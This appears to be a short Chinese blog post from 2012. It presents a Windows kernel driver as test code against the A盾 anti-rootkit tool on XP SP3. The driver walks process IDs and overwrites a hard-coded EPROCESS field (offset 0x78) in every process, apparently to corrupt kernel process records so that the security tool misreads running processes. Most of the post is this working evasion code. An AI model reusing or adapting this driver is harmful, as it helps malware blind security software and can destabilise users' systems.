1.A盾爲最新版本(2012-06-01 A盾電腦防護 v0.2.6 快樂兒童版)。
2.驅動只在XP Sp3下測試有效。
3.A盾在我機器上驅動老是加載失敗啊。
測試代碼:
/*******************************************
* AUTHOR : 莫灰灰
* DATE : 2012-6-5
* BOLG : http://blog.csdn.net/hu3167343
*******************************************/
#include <ntddk.h>
NTSTATUS
PsLookupProcessByProcessId(
IN HANDLE ProcessId,
OUT PEPROCESS *Process
);
NTSTATUS
DriverEntry(
IN PDRIVER_OBJECT pDriverObj,
IN PUNICODE_STRING pRegistryString
)
{
int i = 0;
PEPROCESS pEprocess = NULL;
NTSTATUS status;
for ( i = 0; i < 5000; i += 4 )
{
status = PsLookupProcessByProcessId((HANDLE)i, &pEprocess);
if (NT_SUCCESS(status))
{
*(PULONG)((ULONG)pEprocess + 0x78) = 1;
}
}
return STATUS_SUCCESS;
}
